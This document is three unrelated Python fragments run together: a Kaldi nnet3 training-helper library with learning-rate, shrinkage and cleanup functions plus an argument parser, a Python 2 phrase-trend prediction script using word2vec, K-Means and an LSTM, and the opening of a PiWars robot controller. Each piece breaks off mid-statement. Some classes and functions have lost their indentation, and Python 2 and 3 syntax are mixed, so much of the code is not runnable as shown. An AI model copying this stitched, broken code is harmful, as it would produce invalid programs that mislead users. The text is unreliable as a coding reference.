        pdf_counts: non-empty sequence of per-pdf occupation counts.
        presoftmax_prior_scale_power: exponent applied to smoothed counts.
        smooth: fraction of the average count added to each count.

    Returns:
        A list of scale factors, one per pdf.
    """
    num_pdfs = len(pdf_counts)
    total = sum(pdf_counts)
    average_count = float(total) / num_pdfs
    scales = [math.pow(count + smooth * average_count,
                       presoftmax_prior_scale_power)
              for count in pdf_counts]
    # Normalize once.  The original recomputed sum(scales) inside a map()
    # lambda for every element (O(n^2)) and, on python 3, returned a lazy
    # one-shot map object; return a real list instead.
    scale_sum = sum(scales)
    return [s * float(num_pdfs) / scale_sum for s in scales]
def prepare_initial_network(dir, run_opts, srand=-3):
    """Add the first hidden layer to ``<dir>/init.raw`` using
    ``<dir>/configs/layer1.config`` and write the result to ``<dir>/0.raw``.

    Note: ``dir`` shadows the builtin; kept for interface compatibility.
    """
    common_lib.run_job(
        """{command} {dir}/log/add_first_layer.log \
                nnet3-init --srand={srand} {dir}/init.raw \
                {dir}/configs/layer1.config {dir}/0.raw""".format(
                    command=run_opts.command, srand=srand,
                    dir=dir))
def verify_iterations(num_iters, num_epochs, num_hidden_layers,
                      num_archives, max_models_combine,
                      add_layers_period, num_jobs_final):
    """ Verifies that number of iterations are sufficient for various
    phases of training, and returns the set of iteration indices whose
    models should be combined in the final nnet3-combine stage.

    Args:
        num_iters: total number of training iterations.
        num_epochs: number of epochs (kept for interface compatibility;
            unused here).
        num_hidden_layers: number of hidden layers added layer-wise.
        num_archives: number of egs archives.
        max_models_combine: cap on how many models get combined.
        add_layers_period: iterations between successive layer additions.
        num_jobs_final: number of parallel jobs on the final iteration.

    Returns:
        Set of iteration indices (always including num_iters) to combine.

    Raises:
        Exception: if num_iters is too small for layer-wise training.
    """
    finish_add_layers_iter = num_hidden_layers * add_layers_period
    if num_iters <= (finish_add_layers_iter + 2):
        raise Exception("There are insufficient number of epochs. "
                        "These are not even sufficient for "
                        "layer-wise discriminatory training.")
    # Bug fix: use floor division throughout.  Under python 3 the original
    # '/' produced floats, and the range() calls below then raised
    # TypeError; '//' matches the python 2 integer-division behavior.
    approx_iters_per_epoch_final = num_archives // num_jobs_final
    # Note: it used to be that we would combine over an entire epoch,
    # but in practice we very rarely would use any weights from towards
    # the end of that range, so we are changing it to use not
    # approx_iters_per_epoch_final, but instead:
    # approx_iters_per_epoch_final/2 + 1,
    # dividing by 2 to use half an epoch, and adding 1 just to make sure
    # it's not zero.
    # First work out how many iterations we want to combine over in the final
    # nnet3-combine-fast invocation.
    # The number we use is:
    # min(max(max_models_combine, approx_iters_per_epoch_final/2+1),
    #     1/2 * iters_after_last_layer_added)
    # But if this value is > max_models_combine, then the models
    # are subsampled to get these many models to combine.
    half_iters_after_add_layers = (num_iters - finish_add_layers_iter) // 2
    num_iters_combine_initial = min(approx_iters_per_epoch_final // 2 + 1,
                                    half_iters_after_add_layers)
    if num_iters_combine_initial > max_models_combine:
        subsample_model_factor = int(
            float(num_iters_combine_initial) / max_models_combine)
        num_iters_combine = num_iters_combine_initial
        models_to_combine = set(range(
            num_iters - num_iters_combine_initial + 1,
            num_iters + 1, subsample_model_factor))
        # Always keep the final model in the combination set.
        models_to_combine.add(num_iters)
    else:
        subsample_model_factor = 1
        num_iters_combine = min(max_models_combine,
                                half_iters_after_add_layers)
        models_to_combine = set(range(num_iters - num_iters_combine + 1,
                                      num_iters + 1))
    return models_to_combine
def get_learning_rate(iter, num_jobs, num_iters, num_archives_processed,
                      num_archives_to_process,
                      initial_effective_lrate, final_effective_lrate):
    """Return the actual learning rate for this iteration.

    The effective rate decays exponentially from
    ``initial_effective_lrate`` to ``final_effective_lrate`` as archives
    are processed; the returned value is scaled by ``num_jobs`` so the
    per-sample effective rate stays constant across parallelization levels.
    """
    # On (or past) the last iteration, pin to the final rate exactly.
    if iter + 1 >= num_iters:
        return num_jobs * final_effective_lrate
    # Exponential interpolation: initial * (final/initial)^(done/total).
    log_ratio = math.log(final_effective_lrate / initial_effective_lrate)
    progress_exponent = (num_archives_processed * log_ratio
                         / num_archives_to_process)
    effective_learning_rate = (initial_effective_lrate
                               * math.exp(progress_exponent))
    return num_jobs * effective_learning_rate
def do_shrinkage(iter, model_file, shrink_saturation_threshold,
                 get_raw_nnet_from_am=True):
    """Decide whether to apply parameter shrinkage on this iteration.

    Always shrinks at iteration 0; otherwise measures the nonlinearity
    saturation of *model_file* via steps/nnet3/get_saturation.pl and
    shrinks only when it exceeds *shrink_saturation_threshold*.
    """
    if iter == 0:
        return True
    # Pick the info binary matching the model container format.
    info_binary = "nnet3-am-info" if get_raw_nnet_from_am else "nnet3-info"
    output, error = common_lib.run_kaldi_command(
        "{0} --print-args=false {1} | "
        "steps/nnet3/get_saturation.pl".format(info_binary, model_file))
    output = output.strip().split("\n")
    try:
        # Expect exactly one line holding a saturation value in [0, 1].
        assert len(output) == 1
        saturation = float(output[0])
        assert 0 <= saturation <= 1
    except:
        raise Exception("Something went wrong, could not get "
                        "saturation from the output '{0}' of "
                        "get_saturation.pl on the info of "
                        "model {1}".format(output, model_file))
    return saturation > shrink_saturation_threshold
def remove_nnet_egs(egs_dir):
    """Delete the (large) training examples in *egs_dir* via the standard
    steps/nnet2/remove_egs.sh helper script."""
    common_lib.run_job("steps/nnet2/remove_egs.sh {egs_dir}".format(
        egs_dir=egs_dir))
def clean_nnet_dir(nnet_dir, num_iters, egs_dir,
                   preserve_model_interval=100,
                   remove_egs=True,
                   get_raw_nnet_from_am=True):
    """Clean up intermediate training artifacts.

    Optionally removes the egs directory, then deletes per-iteration
    models except those kept by preserve_model_interval.  Filesystem
    errors are logged and re-raised.
    """
    try:
        if remove_egs:
            remove_nnet_egs(egs_dir)
        for iteration in range(num_iters):
            remove_model(nnet_dir, iteration, num_iters, None,
                         preserve_model_interval,
                         get_raw_nnet_from_am=get_raw_nnet_from_am)
    except (IOError, OSError):
        logger.error("Error while cleaning up the nnet directory")
        raise
def remove_model(nnet_dir, iter, num_iters, models_to_combine=None,
                 preserve_model_interval=100,
                 get_raw_nnet_from_am=True):
    """Delete the model file for one iteration unless it must be kept.

    A model is preserved when its iteration number is a multiple of
    preserve_model_interval, or when it belongs to the set of models that
    will be combined at the end of training.
    """
    keep = (iter % preserve_model_interval == 0
            or (models_to_combine is not None and iter in models_to_combine))
    if keep:
        return
    extension = 'mdl' if get_raw_nnet_from_am else 'raw'
    file_name = '{0}/{1}.{2}'.format(nnet_dir, iter, extension)
    if os.path.isfile(file_name):
        os.remove(file_name)
def self_test():
    """Sanity checks for the minibatch-size and chunk-width helpers."""
    for arg, expected in [
            ('64', '32'),
            ('64,16:32', '32,8:16'),
            ('1', '1'),
            ('128=64/256=40,80:100', '128=32/256=20,40:50')]:
        assert halve_minibatch_size_str(arg) == expected
    for spec in ('64', '64,25,128'):
        assert validate_chunk_width(spec)
class CommonParser:
"""Parser for parsing common options related to nnet3 training.
This argument parser adds common options related to nnet3 training
such as egs creation, training optimization options.
These are used in the nnet3 train scripts
in steps/nnet3/train*.py and steps/nnet3/chain/train.py
"""
parser = argparse.ArgumentParser(add_help=False)
def __init__(self,
include_chunk_context = True,
default_chunk_left_context=0):
# feat options
self.parser.add_argument("--feat.online-ivector-dir", type=str,
dest='online_ivector_dir', default=None,
action=common_lib.NullstrToNoneAction,
help="""directory with the ivectors extracted
in an online fashion.""")
self.parser.add_argument("--feat.cmvn-opts", type=str,
dest='cmvn_opts', default=None,
action=common_lib.NullstrToNoneAction,
help="A string specifying '--norm-means' "
"and '--norm-vars' values")
# egs extraction options. there is no point adding the chunk context
# option for non-RNNs (by which we mean basic TDNN-type topologies), as
# it wouldn't affect anything, so we disable them if we know in advance
# that we're not supporting RNN-type topologies (as in train_dnn.py).
if include_chunk_context:
self.parser.add_argument("--egs.chunk-left-context", type=int,
dest='chunk_left_context',
default=default_chunk_left_context,
help="""Number of additional frames of input
to the left of the input chunk. This extra
context will be used in the estimation of RNN
state before prediction of the first label. In
the case of FF-DNN this extra context will be
used to allow for frame-shifts""")
self.parser.add_argument("--egs.chunk-right-context", type=int,
dest='chunk_right_context', default=0,
help="""Number of additional frames of input
to the right of the input chunk. This extra
context will be used in the estimation of
bidirectional RNN state before prediction of
the first label.""")
self.parser.add_argument("--egs.chunk-left-context-initial", type=int,
dest='chunk_left_context_initial', default=-1,
help="""Number of additional frames of input
to the left of the *first* input chunk extracted
from an utterance. If negative, defaults to
the same as --egs.chunk-left-context""")
self.parser.add_argument("--egs.chunk-right-context-final", type=int,
dest='chunk_right_context_final', default=-1,
help="""Number of additional frames of input
to the right of the *last* input chunk extracted
from an utterance. If negative, defaults to the
same as --egs.chunk-right-context""")
self.parser.add_argument("--egs.transform_dir", type=str,
dest='transform_dir', default=None,
action=common_lib.NullstrToNoneAction,
help="String to provide options directly to "
"steps/nnet3/get_egs.sh script")
self.parser.add_argument("--egs.dir", type=str, dest='egs_dir',
default=None,
action=common_lib.NullstrToNoneAction,
help="""Directory with egs. If specified this
directory will be used rather than extracting
egs""")
self.parser.add_argument("--egs.stage", type=int, dest='egs_stage',
default=0,
help="Stage at which get_egs.sh should be "
"restarted")
self.parser.add_argument("--egs.opts", type=str, dest='egs_opts',
default=None,
action=common_lib.NullstrToNoneAction,
help="""String to provide options directly
to steps/nnet3/get_egs.sh script""")
# trainer options
self.parser.add_argument("--trainer.srand", type=int, dest='srand',
default=0,
help="""Sets the random seed for model
initialization and egs shuffling.
Warning: This random seed does not control all
aspects of this experiment. There might be
other random seeds used in other stages of the
experiment like data preparation (e.g. volume
perturbation).""")
self.parser.add_argument("--trainer.num-epochs", type=float,
dest='num_epochs', default=8.0,
help="Number of epochs to train the model")
self.parser.add_argument("--trainer.shuffle-buffer-size", type=int,
dest='shuffle_buffer_size', default=5000,
help=""" Controls randomization of the samples
on each iteration. If 0 or a large value the
randomization is complete, but this will
consume memory and cause spikes in disk I/O.
Smaller is easier on disk and memory but less
random. It's not a huge deal though, as
samples are anyway randomized right at the
start. (the point of this is to get data in
different minibatches on different iterations,
since in the preconditioning method, 2 samples
in the same minibatch can affect each others'
gradients.""")
self.parser.add_argument("--trainer.add-layers-period", type=int,
dest='add_layers_period', default=2,
help="""The number of iterations between
adding layers during layer-wise discriminative
training.""")
self.parser.add_argument("--trainer.max-param-change", type=float,
dest='max_param_change', default=2.0,
help="""The maximum change in parameters
allowed per minibatch, measured in Frobenius
norm over the entire model""")
self.parser.add_argument("--trainer.samples-per-iter", type=int,
dest='samples_per_iter', default=400000,
help="This is really the number of egs in "
"each archive.")
self.parser.add_argument("--trainer.lda.rand-prune", type=float,
dest='rand_prune', default=4.0,
help="Value used in preconditioning "
"matrix estimation")
self.parser.add_argument("--trainer.lda.max-lda-jobs", type=float,
dest='max_lda_jobs', default=10,
help="Max number of jobs used | |
import os
import sys
import json
import numpy as np
from sklearn import linear_model
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_squared_error
import matplotlib.pyplot as plt
from collections import Counter
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import cross_val_predict
from sklearn.model_selection import KFold
from sklearn.cluster import KMeans
from gensim import corpora, models
import math
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import SimpleRNN
from keras.layers import Embedding
def writeScore(dictFile, fileName):
    """Write a dict to fileName, one "key: value" line per entry.

    Uses a context manager so the file is closed even if a write fails
    (the original left the handle open on error).
    """
    with open(fileName, "w") as theFile:
        for item in dictFile:
            theFile.write("%s: %s\n" % (str(item), str(dictFile[item])))
    return
def writeList(listFile, fileName):
    """Write each element of listFile to fileName, one per line.

    Uses a context manager so the file is closed even if a write fails
    (the original left the handle open on error).
    """
    with open(fileName, "w") as theFile:
        for item in listFile:
            theFile.write("%s\n" % str(item))
    return
def writeWordEmbLists(wordembsamplesArray, wordembsamplesArrayPredict, fileName):
    """Write actual vs. predicted top phrases per year, side by side.

    A phrase appearing in the other column for the same year is tagged
    with a trailing tab and "++".  The actual column is padded to a fixed
    width of 35 characters.
    """
    column_width = 35
    final_year = 2014
    num_years = len(wordembsamplesArray)
    num_phrases = len(wordembsamplesArray[0])
    base_year = final_year - num_years
    with open(fileName, "w") as out:
        for y in range(num_years):
            out.write("%s Actual -------------------- Predict\n" % str(base_year + y))
            for p in range(num_phrases):
                actual = wordembsamplesArray[y][p]
                if actual in wordembsamplesArrayPredict[y]:
                    actual += "\t++"
                predicted = wordembsamplesArrayPredict[y][p]
                if predicted in wordembsamplesArray[y]:
                    predicted += "\t++"
                # ljust reproduces the original manual space padding
                out.write(actual.ljust(column_width))
                out.write("%s\n" % predicted)
            out.write("\n\n")
    return
def writeTopPhrasesList(topPhrases, baseYear, fileName):
    """Write per-year topic phrase lists to fileName.

    Each year gets a "<year>: " header, then its topics separated by
    blank lines.  Phrases are written as str(phrase.encode('utf-8')),
    preserved exactly as in the original (under Python 3 this yields the
    b'...' repr).
    """
    with open(fileName, "w") as out:
        for offset, yearPhrase in enumerate(topPhrases):
            out.write("%s: \n" % str(offset + baseYear))
            for topic in yearPhrase:
                for phrase in topic:
                    out.write("%s\n" % str(phrase.encode('utf-8')))
                out.write("\n")
            out.write("\n")
    return
def readVocabSeries(fileName):
    """Read a vocab file where each line is a ", "-separated list.

    Returns one list of strings per line; only the trailing newline is
    stripped.
    """
    with open(fileName, 'r') as fp:
        return [line.strip("\n").split(", ") for line in fp]
def readTimeSeriesData(fileName):
    """Read "phrase:score score ..." lines from fileName.

    "nan " tokens are replaced with "0 " before parsing.  Returns
    (phraseList, timeSeries) where timeSeries[i] holds the float scores
    for phraseList[i].
    """
    phraseList = []
    timeSeries = []
    # The original never closed the file; use a context manager so the
    # handle is released even on error.
    with open(fileName, "r") as fp:
        for line in fp:
            temp = line.replace("nan ", "0 ").split(":")
            phraseList.append(temp[0])
            timeSeries.append([float(ele) for ele in temp[1].split(" ")])
    return phraseList, timeSeries
def splitData2(timeSeries, windowSize):
    """Build sliding-window training batches grouped by window position.

    For each window start position, produces one X batch (one sample per
    phrase) and one Y batch (the value right after each window).  Each
    sample is the window slice augmented by addFeatures() and prefixed
    with its phrase index.  Returns (resultXList, resultYList, numWindows).
    """
    numWindows = len(timeSeries[0]) - windowSize
    numPhrases = len(timeSeries)
    resultXList = []
    resultYList = []
    for start in range(numWindows):
        batchX = []
        batchY = []
        for phrase in range(numPhrases):
            sample = timeSeries[phrase][start:start + windowSize]
            sample = addFeatures(sample, 5)
            # phrase index becomes the first feature
            sample.insert(0, phrase)
            batchX.append(sample)
            batchY.append(timeSeries[phrase][start + windowSize])
        resultXList.append(batchX)
        resultYList.append(batchY)
    return resultXList, resultYList, numWindows
def splitData3(timeSeries, windowSize):
    """Flatten sliding-window samples across all phrases and positions.

    Each X sample is [window index, phrase index, window scores...]; Y is
    the score immediately after the window.  powerTerms is returned empty
    and kept only for interface compatibility.
    Returns (resultX, resultY, powerTerms, size).
    """
    size = len(timeSeries[0]) - windowSize
    numPhrases = len(timeSeries)
    resultX = []
    resultY = []
    powerTerms = []
    for start in range(size):
        for phrase in range(numPhrases):
            window = timeSeries[phrase][start:start + windowSize]
            # format of data: [year index, phrase index, scores]
            resultX.append([start, phrase] + window)
            resultY.append(timeSeries[phrase][start + windowSize])
    return resultX, resultY, powerTerms, size
def combination(currentTrainingSample):
    """Return all pairwise products sample[i] * sample[j] for i <= j."""
    n = len(currentTrainingSample)
    return [currentTrainingSample[i] * currentTrainingSample[j]
            for i in range(n) for j in range(i, n)]
def generatePowerset(s):
    """Return the power set of sequence s as a list of lists.

    Subsets are ordered by a binary counter over element positions: the
    empty set first, the full set last.
    """
    n = len(s)
    subsets = []
    for mask in range(2 ** n):
        subsets.append([s[j] for j in range(n) if mask & (1 << j)])
    return subsets
def mapPhraseListUsingIndex(phraseIndexList, phraseList):
    """Return the phrases whose positions appear in phraseIndexList.

    Output order follows phraseList (ascending index) regardless of the
    order of phraseIndexList; duplicate indices contribute one phrase.
    """
    # Set gives O(1) membership; the original scanned the index list once
    # per phrase (O(n*m)).
    wanted = set(phraseIndexList)
    return [phrase for index, phrase in enumerate(phraseList)
            if index in wanted]
def writePhraseListTotal(phraseList, fileName):
    """Write nested phrase lists to fileName.

    Each inner list is written on its own line via str(), with a blank
    line after every year group.
    """
    with open(fileName, "w") as out:
        for yearGroup in phraseList:
            for subList in yearGroup:
                out.write("%s\n" % str(subList))
            out.write("\n")
    return
def isSubarray(small, big):
    """Return True if `small` occurs as a contiguous run inside `big`."""
    width = len(small)
    return any(np.array_equal(big[start:start + width], small)
               for start in range(len(big) - width + 1))
def checkPrecisionRecall(Xdata, Ydata, Yprediction):
    """Precision/recall/F1 for "trending" detection.

    A sample counts as actually (resp. predicted) trending when its
    actual (resp. predicted) target exceeds the maximum of its input
    window.  Returns (precision, recall, f1); precision or recall is the
    string 'NA' when its denominator is zero, in which case f1 stays 0.
    """
    Xdata = np.asarray(Xdata)
    Ydata = np.asarray(Ydata)
    Yprediction = np.asarray(Yprediction)
    maxXdata = np.amax(Xdata, axis=1)
    actualDist = maxXdata < Ydata
    predictDist = maxXdata < Yprediction
    TP = np.count_nonzero(actualDist & predictDist)
    precision, recall, f1 = 0, 0, 0
    # np.float was removed in NumPy 1.24; the builtin float is equivalent
    # here.  (The original also computed an unused, mislabeled "TN".)
    if np.count_nonzero(predictDist) != 0:
        precision = float(TP) / np.count_nonzero(predictDist)
    else:
        precision = 'NA'
    if np.count_nonzero(actualDist) != 0:
        recall = float(TP) / np.count_nonzero(actualDist)
    else:
        recall = 'NA'
    if precision != 'NA' and recall != 'NA' and (precision + recall) > 0:
        f1 = 2 * (precision * recall) / (precision + recall)
    return precision, recall, f1
def retrieveTrendingIndices(Xdata, Ydata, Yprediction):
    """Return indices of the 20 largest positive jumps above the window max.

    Jumps are (value - max of the input window), clipped at zero, for the
    actual targets, the predictions, and their elementwise product (a
    "true positive" strength).  Requires at least 20 samples; ordering
    within each group of 20 is unspecified (np.argpartition).
    """
    Xdata = np.asarray(Xdata)
    Ydata = np.asarray(Ydata)
    Yprediction = np.asarray(Yprediction)
    windowMax = np.amax(Xdata, axis=1)
    actualJump = np.asarray([v if v > 0 else 0 for v in (Ydata - windowMax)])
    predictJump = np.asarray([v if v > 0 else 0
                              for v in (Yprediction - windowMax)])
    tpJump = np.asarray(actualJump * predictJump)

    def topTwenty(arr):
        # indices of the 20 largest entries, order unspecified
        return np.argpartition(arr, -20)[-20:]

    return topTwenty(actualJump), topTwenty(predictJump), topTwenty(tpJump)
def calcMRRMAPNDCG(actualIndices, predictIndices):
    """Return the nDCG of predictIndices against actualIndices.

    Relevance scores are 1/(rank+1) for the ground-truth ranking.  A
    predicted entry earns credit only when it matches the ground-truth
    entry at the SAME position (elementwise comparison); both arguments
    must be numpy arrays of equal length.

    NOTE(review): the commented-out block in the original suggests
    membership-based matching may have been intended -- confirm before
    relying on the position-exact behavior.
    """
    num = len(actualIndices)
    scores = np.asarray([float(1) / (i + 1) for i in range(num)])
    predictScores = np.zeros(num, dtype=float)
    DCG_GT = scores[0]
    for index in range(1, num):
        DCG_GT += (scores[index] / math.log((index + 1), 2))
    mask = actualIndices == predictIndices
    predictScores[mask] = scores[mask]
    DCG_Pred = predictScores[0]
    for index in range(1, num):
        DCG_Pred += (predictScores[index] / math.log((index + 1), 2))
    nDCG = DCG_Pred / DCG_GT
    # print() calls instead of Python-2-only print statements, so this
    # also runs under Python 3 (same output under Python 2).
    print("GT: %f" % DCG_GT)
    print("Pr: %f" % DCG_Pred)
    return nDCG
def scale(originalData):
    """Min-max scale originalData onto [0, 1]; returns a numpy array."""
    values = np.array(originalData)
    low, high = values.min(), values.max()
    return (values - low) / (high - low)
def scale2DArray(originalData):
    """Min-max scale each row of a 2-D array independently onto [0, 1]."""
    rows = np.array(originalData)
    scaled = [(row - row.min()) / (row.max() - row.min()) for row in rows]
    return np.array(scaled)
def formWordEmbeddingTrainingData(seqOfPhrases, emb, embvocab):
    """Build (X, Y) embedding training pairs from yearly top-phrase lists.

    For each 3-year input window and each top-k cutoff (k = 1..20), X is
    the decay-weighted average (weights 0.8**n, oldest year weighted
    least) of the mean phrase embeddings of the window years, and Y is
    the mean embedding of the following year.  The full-k samples are
    also returned separately.

    Python 2 code: relies on `print` statements and on `map` returning a
    list.  NOTE(review): assumes `emb` is a gensim word2vec-style model
    exposing `emb.wv[word]` and `embvocab` supports membership tests --
    confirm against the caller.
    """
    windowSize = 3
    # decaying weights, reversed so the most recent year gets weight 1.0
    decayingWeights = [0.8 ** n for n in range(windowSize)][::-1]
    predefinedK = 20
    totalYear = len(seqOfPhrases)
    resultX = []
    resultY = []
    fullResultX = []
    fullResultY = []
    for yearIndex in range(totalYear - windowSize):
        print "Currently processing year: " + str(yearIndex)
        # the window years plus the target year (windowSize + 1 lists)
        yearWords = [seqOfPhrases[yearIndex + n] for n in range(windowSize + 1)]
        # year1Words = seqOfPhrases[yearIndex]
        # year2Words = seqOfPhrases[yearIndex + 1]
        # year3Words = seqOfPhrases[yearIndex + 2]
        # year4Words = seqOfPhrases[yearIndex + 3]
        for phraseIndex in range(predefinedK):
            print "getting phrases: " + str(phraseIndex)
            # top (phraseIndex + 1) phrases of each year in the window
            currYearWords = [yearWords[n][:(phraseIndex + 1)] for n in range(windowSize + 1)]
            # currYear1Words = year1Words[:(phraseIndex + 1)]
            # currYear2Words = year2Words[:(phraseIndex + 1)]
            # currYear3Words = year3Words[:(phraseIndex + 1)]
            # currYear4Words = year4Words[:(phraseIndex + 1)]
            currYearMatrices = [[] for n in range(windowSize + 1)]
            # one embedding matrix per year; out-of-vocab phrases are skipped
            currYearMatrices = map(lambda x: np.asarray([emb.wv[ele] for ele in x if ele in embvocab]), currYearWords)
            # for currYearWordList in currYearWords:
            # for currYearWord in currYearWordList:
            # if currYearWord in embvocab:
            # currYearVector = emb.wv[currYearWord]
            # mean embedding per year
            currYearVectors = [np.average(innerMatrix, axis = 0) for innerMatrix in currYearMatrices]
            # last vector is the target year; the rest form the input window
            trainingY = currYearVectors.pop()
            trainingX = np.average(np.asarray(currYearVectors), axis = 0, weights = decayingWeights)
            resultX.append(trainingX)
            resultY.append(trainingY)
            if phraseIndex == (predefinedK - 1):
                fullResultX.append(trainingX)
                fullResultY.append(trainingY)
    return np.asarray(resultX), np.asarray(resultY), np.asarray(fullResultX), np.asarray(fullResultY)
def trainEmbWords(trainX, trainY, fullX):
    """Train a 3-layer LSTM on embedding pairs and predict for fullX.

    trainX/trainY are 2-D (samples, embedding_dim) arrays; inputs are
    reshaped to (samples, 1, dim) for the LSTM.  Returns the model's
    predictions for fullX.  Python 2 code (print statement).

    NOTE(review): 500 epochs with batch size 10 is slow; no validation
    split or early stopping is used -- confirm this is intentional.
    """
    model = Sequential()
    # output dimensionality equals the embedding width
    lookback = len(trainX[0])
    trainXLSTM = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
    trainFullX = np.reshape(fullX, (fullX.shape[0], 1, fullX.shape[1]))
    print "Training LSTM for word embeddings"
    model.add(LSTM(200, return_sequences = True, input_shape = trainXLSTM.shape[1:]))
    # model.add(Dropout(0.5))
    model.add(LSTM(200, return_sequences = True))
    # model.add(Dropout(0.5))
    model.add(LSTM(200))
    # model.add(Dropout(0.5))
    model.add(Dense(lookback))
    model.compile(loss="mean_squared_error", optimizer = "rmsprop")
    model.fit(trainXLSTM, trainY, epochs = 500, batch_size = 10, verbose = 2)
    fullYPredict = model.predict(trainFullX)
    return fullYPredict
def prepareWordWithGoogleMatrix(wordList, timeSeries, baseYear, vocabTfIdfSeriesMap, clusters):
    """Score each phrase per year by closeness to its K-Means topic centroid.

    For every year, phrases with nonzero time-series values are embedded
    as tf-idf-weighted averages of their words' GoogleNews word2vec
    vectors, clustered with K-Means, and scored by cosine similarity to
    their cluster centroid (via the sibling cossim()).  Also collects,
    per year, the 10 phrases nearest each centroid.

    Returns (result, topPhrases) where result[phrase][year] is the
    relativeness score (0.0 when the phrase is missing that year).

    Python 2 code (print statements, `except KeyError, e`).  Loads the
    full GoogleNews-vectors-negative300.bin model from the working
    directory -- heavyweight and path-dependent.
    """
    yearCover = len(timeSeries[0])
    phraseCount = len(wordList)
    result = [[0.0 for n in range(yearCover)] for i in range(phraseCount)]
    model = models.KeyedVectors.load_word2vec_format('GoogleNews-vectors-negative300.bin', binary=True)
    # vocabSeries = readVocabSeries("single/vocabSeries.txt")
    # probe an arbitrary common word to learn the embedding dimensionality
    vectorShape = model.wv['the'].shape
    vectors = []
    topPhrases = []
    timeSeries = np.asarray(timeSeries)
    wordListCopy = list(wordList)
    wordList = np.asarray(wordList)
    for yearIndex in range(yearCover):
        predefinedNumOfClusters = clusters
        # vocab = vocabSeries[index]
        # only phrases active (nonzero score) in this year
        currVocab = wordList[np.nonzero(timeSeries[:, yearIndex])[0]]
        vectors = []
        missingList = []
        for NP in currVocab:
            try:
                words = NP.split(" ")
                tfIdfSum = 0.0
                vectorSum = np.zeros(vectorShape) # initialize the zero vector
                # tf-idf-weighted average of the phrase's word vectors
                for individualWord in words:
                    currVector = model.wv[individualWord]
                    currTfIdf = vocabTfIdfSeriesMap[individualWord][yearIndex]
                    # print individualWord
                    # print currTfIdf
                    tfIdfSum += currTfIdf
                    vectorSum = vectorSum + currVector * currTfIdf
                # print vectorSum
                vectors.append(vectorSum / tfIdfSum)
            except KeyError, e:
                # word missing from word2vec or the tf-idf map: drop phrase
                print "The error is: %s, in year %d" % (e, yearIndex + baseYear)
                missingList.append(NP)
                pass
        currVocab = currVocab.tolist()
        for missingNP in missingList:
            currVocab.remove(missingNP)
        print "Now running K Means"
        # can't ask for more clusters than we have vectors
        numOfClusters = predefinedNumOfClusters if len(vectors) > predefinedNumOfClusters else len(vectors)
        # print vectors
        print np.array(vectors)
        try:
            kmeans = KMeans(n_clusters = numOfClusters, random_state = 0).fit(np.array(vectors))
        except ValueError, e:
            # e.g. no usable vectors for this year: skip it entirely
            print "The array problem is: %s, in year %d" % (e, yearIndex + baseYear)
            continue
        print "Finished running K Means"
        centers = kmeans.cluster_centers_
        smallestDistance = 100.0
        for phraseIndex in range(len(currVocab)):
            word = currVocab[phraseIndex]
            vector = vectors[phraseIndex]
            label = kmeans.labels_[phraseIndex]
            centroid = centers[label]
            distance = np.linalg.norm(vector - centroid)
            # if distance == 0.0:
            # distance = smallestDistance / 100 # think about another way to do this, otherwise is magic number
            # elif distance < smallestDistance:
            # smallestDistance = distance
            # relativeness = 1.0 / distance
            # cosine similarity to the centroid (sibling helper cossim)
            relativeness = cossim(vector, centroid)
            if word in wordListCopy:
                # newListIndex = np.where(wordList == word)[0]
                newListIndex = wordListCopy.index(word)
                result[newListIndex][yearIndex] = relativeness
        currTopPhrases = []
        for center in centers:
            topKeyphrases = [ele[0] for ele in model.similar_by_vector(center, topn = 10)]
            currTopPhrases.append(topKeyphrases)
        topPhrases.append(currTopPhrases)
    return result, topPhrases
def preparePhraseRelativenessMatrix(phraseList, timeSeries, baseYear):
yearCover = len(timeSeries[0])
phraseCount = len(phraseList)
result = [[0 for n in range(yearCover)] for i in range(phraseCount)]
embFileList = os.listdir('single/emblistflat/')
continuousEmbFileList = os.listdir('single/emblist/')
topPhrases = []
vocabMap = {}
for fileName in embFileList:
year = int(fileName.split("-")[1])
print "processing file iter 1: %s" % str(year)
model = models.Word2Vec.load('single/emblistflat/' + fileName)
vocab = list(model.wv.vocab)
vocabMap[year] = vocab
# vectors = []
# for word in vocab:
# vectors.append(model.wv[word])
# kmeans = KMeans(n_clusters = 5, random_state = 0).fit(np.array(vectors))
# centers = kmeans.cluster_centers_
# for phraseIndex in range(len(vocab)):
# word = vocab[phraseIndex]
# vector = vectors[phraseIndex]
# label = kmeans.labels_[phraseIndex]
# centroid = centers[label]
# distance = np.linalg.norm(vector - centroid)
# relativeness = 1.0 / distance
# if word in phraseList:
# newListIndex = phraseList.index(word)
# result[newListIndex][year - baseYear] = relativeness
# currTopPhrases = []
# for center in centers:
# topKeyphrases = [ele[0] for ele in model.similar_by_vector(center, topn = 10)]
# currTopPhrases.append(topKeyphrases)
# topPhrases.append(currTopPhrases)
for fileName | |
<reponame>ForestFighters/PiWars2020
#!/usr/bin/env python
# coding: Latin-1
# Load library functions we want
import time
import sys
import gpiozero
import numpy as np
import cv2 as cv
#import picamera.array
from PIL import Image
from camera import Camera
from robot import Robot
from approxeng.input.selectbinder import ControllerResource
from argparse import ArgumentParser
import logging
import os
from time import sleep
from rectangle import Rectangle
#from picamera import PiCamera
from picamera.array import PiRGBArray
from picamera.array import PiYUVArray
# COLOURS = {
# "red": ([-10,80,30],[10,255,255]),
# "green": ([50,80,30],[70,255,255]),
# "blue": ([110,80,30],[130,255,255]),
# }
def seconds():
    """Current wall-clock time rounded to whole seconds.

    Was a lambda assignment; PEP 8 (E731) prefers a def, which also gives
    the callable a useful __name__ in tracebacks.
    """
    return int(round(time.time()))

# Delay between main-loop iterations (currently disabled).
INTERVAL = 0.0
LOGGER = logging.getLogger(__name__)
class Controller():
mode = None
button = 0
def __init__(self):
self.last_text = ''
self.bot = Robot()
interval = 0.0
self.w = 320
self.h = 240
self.camera = Camera(self.w, self.h)
super().__init__()
    def run(self):
        """Main menu loop: show menu images, track joystick navigation,
        and dispatch the selected challenge via doMenu().

        Left/right on the d-pad cycles the menu (1..8); select runs the
        current entry.  IOError (no joystick) shows a "not found" screen
        and retries; Ctrl+C stops the motors and exits the loop.
        """
        self.show('Started')
        cv.namedWindow('image', cv.WND_PROP_FULLSCREEN)
        cv.setWindowProperty('image',cv.WND_PROP_FULLSCREEN,cv.WINDOW_FULLSCREEN)
        # pre-load one splash image per menu entry / state
        menu_img = self.loadMenuImage('/home/pi/Pictures/Menu.jpg')
